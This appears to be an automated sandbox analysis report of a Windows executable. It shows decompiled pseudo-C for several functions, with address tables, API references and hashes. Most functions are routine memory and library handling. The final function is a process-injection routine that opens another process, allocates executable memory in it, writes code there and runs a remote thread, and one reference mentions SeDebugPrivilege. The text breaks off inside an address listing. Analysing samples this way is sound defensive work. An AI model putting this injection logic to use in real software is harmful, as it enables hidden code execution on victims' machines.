                                                                                                                                                                  • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}





























                                                                                                                                                                  0x004056b5
                                                                                                                                                                  0x004056c3
                                                                                                                                                                  0x004056c5
                                                                                                                                                                  0x004056cc
                                                                                                                                                                  0x004056cf
                                                                                                                                                                  0x004056d2
                                                                                                                                                                  0x004056d5
                                                                                                                                                                  0x004056dc
                                                                                                                                                                  0x004056df
                                                                                                                                                                  0x004056e2
                                                                                                                                                                  0x004056e5
                                                                                                                                                                  0x004056e8
                                                                                                                                                                  0x004056ef
                                                                                                                                                                  0x004056f2
                                                                                                                                                                  0x004056f7
                                                                                                                                                                  0x004056fd
                                                                                                                                                                  0x00405832
                                                                                                                                                                  0x00405832
                                                                                                                                                                  0x00405835
                                                                                                                                                                  0x00405835
                                                                                                                                                                  0x00405838
                                                                                                                                                                  0x0040583e
                                                                                                                                                                  0x00405849
                                                                                                                                                                  0x00405849
                                                                                                                                                                  0x00405703
                                                                                                                                                                  0x00405706
                                                                                                                                                                  0x00405709
                                                                                                                                                                  0x00405710
                                                                                                                                                                  0x0040575b
                                                                                                                                                                  0x00405766
                                                                                                                                                                  0x0040577b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040577d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040577d
                                                                                                                                                                  0x0040576b
                                                                                                                                                                  0x0040576e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405783
                                                                                                                                                                  0x00405783
                                                                                                                                                                  0x00405785
                                                                                                                                                                  0x004057d1
                                                                                                                                                                  0x004057dc
                                                                                                                                                                  0x004057e4
                                                                                                                                                                  0x004057e8
                                                                                                                                                                  0x004057eb
                                                                                                                                                                  0x004057ec
                                                                                                                                                                  0x004057ef
                                                                                                                                                                  0x004057ef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004057ef
                                                                                                                                                                  0x0040578b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405790
                                                                                                                                                                  0x00405796
                                                                                                                                                                  0x00405798
                                                                                                                                                                  0x0040579e
                                                                                                                                                                  0x004057a1
                                                                                                                                                                  0x004057b4
                                                                                                                                                                  0x004057a3
                                                                                                                                                                  0x004057a5
                                                                                                                                                                  0x004057a5
                                                                                                                                                                  0x004057ba
                                                                                                                                                                  0x004057c1
                                                                                                                                                                  0x004057c3
                                                                                                                                                                  0x004057c3
                                                                                                                                                                  0x004057c8
                                                                                                                                                                  0x004057cb
                                                                                                                                                                  0x004057cb
                                                                                                                                                                  0x004057ce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004057ce
                                                                                                                                                                  0x00405717
                                                                                                                                                                  0x0040571a
                                                                                                                                                                  0x00405725
                                                                                                                                                                  0x0040572a
                                                                                                                                                                  0x0040572f
                                                                                                                                                                  0x00405733
                                                                                                                                                                  0x00405735
                                                                                                                                                                  0x00405735
                                                                                                                                                                  0x0040573e
                                                                                                                                                                  0x00405743
                                                                                                                                                                  0x00405746
                                                                                                                                                                  0x0040574d
                                                                                                                                                                  0x00405750
                                                                                                                                                                  0x00405750
                                                                                                                                                                  0x0040571a
                                                                                                                                                                  0x004057f2
                                                                                                                                                                  0x004057f2
                                                                                                                                                                  0x004057f8
                                                                                                                                                                  0x004057fe
                                                                                                                                                                  0x004057fe
                                                                                                                                                                  0x00405809
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405810
                                                                                                                                                                  0x00405815
                                                                                                                                                                  0x0040581a
                                                                                                                                                                  0x0040581e
                                                                                                                                                                  0x00405820
                                                                                                                                                                  0x00405820
                                                                                                                                                                  0x00405825
                                                                                                                                                                  0x0040582b
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                                                                    • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                  • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID: "
                                                                                                                                                                  • API String ID: 1294909896-123907689
                                                                                                                                                                  • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                                                                  • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                                                                                                  • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                                                                                                  0x004054bc
                                                                                                                                                                  0x004054c4
                                                                                                                                                                  0x004054cd
                                                                                                                                                                  0x004054cf
                                                                                                                                                                  0x004054d2
                                                                                                                                                                  0x004054d5
                                                                                                                                                                  0x004054d8
                                                                                                                                                                  0x004054db
                                                                                                                                                                  0x004054de

                                                                                                                                                                  APIs
                                                                                                                                                                  • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                                                                  • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                  • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                                                                  • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                                                                                  • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                                                                  • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                                                                  0x00408f4c
                                                                                                                                                                  0x00408f57
                                                                                                                                                                  0x00408f60
                                                                                                                                                                  0x00408f62
                                                                                                                                                                  0x00408f67
                                                                                                                                                                  0x00408f67
                                                                                                                                                                  0x00408f71

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                    • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 187924719-0
                                                                                                                                                                  • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                  • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                  • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                                                                  0x004098fa
                                                                                                                                                                  0x004098fc
                                                                                                                                                                  0x00409901
                                                                                                                                                                  0x00409907
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040991c
                                                                                                                                                                  0x00409918
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3859505661-0
                                                                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                  • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                                                                  0x004095da
                                                                                                                                                                  0x004095da
                                                                                                                                                                  0x004095de
                                                                                                                                                                  0x004095e1
                                                                                                                                                                  0x004095e7
                                                                                                                                                                  0x004095e7
                                                                                                                                                                  0x004095ee
                                                                                                                                                                  0x004095fc

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                                                                  • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                                                                  • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                                                                  0x0040a3d0
                                                                                                                                                                  0x0040a3d9

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                  • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                                                                  • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                                                                  • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}





                                                                                                                                                                  0x004055d1
                                                                                                                                                                  0x004055d1
                                                                                                                                                                  0x004055d5
                                                                                                                                                                  0x004055da
                                                                                                                                                                  0x004055df
                                                                                                                                                                  0x004055e3
                                                                                                                                                                  0x004055e4
                                                                                                                                                                  0x004055e8
                                                                                                                                                                  0x004055eb

                                                                                                                                                                  APIs
                                                                                                                                                                  • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                  • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                                                                  • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                                                                                                  • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                                                                  • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                                                                  0x0040a474
                                                                                                                                                                  0x0040a47b
                                                                                                                                                                  0x0040a48a
                                                                                                                                                                  0x0040a48d
                                                                                                                                                                  0x0040a48f
                                                                                                                                                                  0x0040a497
                                                                                                                                                                  0x0040a49a
                                                                                                                                                                  0x0040a6f7
                                                                                                                                                                  0x0040a6f9
                                                                                                                                                                  0x0040a700
                                                                                                                                                                  0x0040a700
                                                                                                                                                                  0x0040a4ad
                                                                                                                                                                  0x0040a4b3
                                                                                                                                                                  0x0040a4b8
                                                                                                                                                                  0x0040a4c6
                                                                                                                                                                  0x0040a4cc
                                                                                                                                                                  0x0040a4cf
                                                                                                                                                                  0x0040a4dd
                                                                                                                                                                  0x0040a4e2
                                                                                                                                                                  0x0040a4e3
                                                                                                                                                                  0x0040a4ea
                                                                                                                                                                  0x0040a4e5
                                                                                                                                                                  0x0040a4e5
                                                                                                                                                                  0x0040a4e5
                                                                                                                                                                  0x0040a4ec
                                                                                                                                                                  0x0040a4f6
                                                                                                                                                                  0x0040a4fe
                                                                                                                                                                  0x0040a503
                                                                                                                                                                  0x0040a504
                                                                                                                                                                  0x0040a50b
                                                                                                                                                                  0x0040a506
                                                                                                                                                                  0x0040a506
                                                                                                                                                                  0x0040a506
                                                                                                                                                                  0x0040a50d
                                                                                                                                                                  0x0040a512
                                                                                                                                                                  0x0040a518
                                                                                                                                                                  0x0040a51c
                                                                                                                                                                  0x0040a523
                                                                                                                                                                  0x0040a523
                                                                                                                                                                  0x0040a523
                                                                                                                                                                  0x0040a528
                                                                                                                                                                  0x0040a537
                                                                                                                                                                  0x0040a54c
                                                                                                                                                                  0x0040a539
                                                                                                                                                                  0x0040a544
                                                                                                                                                                  0x0040a549
                                                                                                                                                                  0x0040a558
                                                                                                                                                                  0x0040a56d
                                                                                                                                                                  0x0040a55a
                                                                                                                                                                  0x0040a565
                                                                                                                                                                  0x0040a56a
                                                                                                                                                                  0x0040a579
                                                                                                                                                                  0x0040a591
                                                                                                                                                                  0x0040a57b
                                                                                                                                                                  0x0040a589
                                                                                                                                                                  0x0040a58e
                                                                                                                                                                  0x0040a5b4
                                                                                                                                                                  0x0040a5b7
                                                                                                                                                                  0x0040a5cc
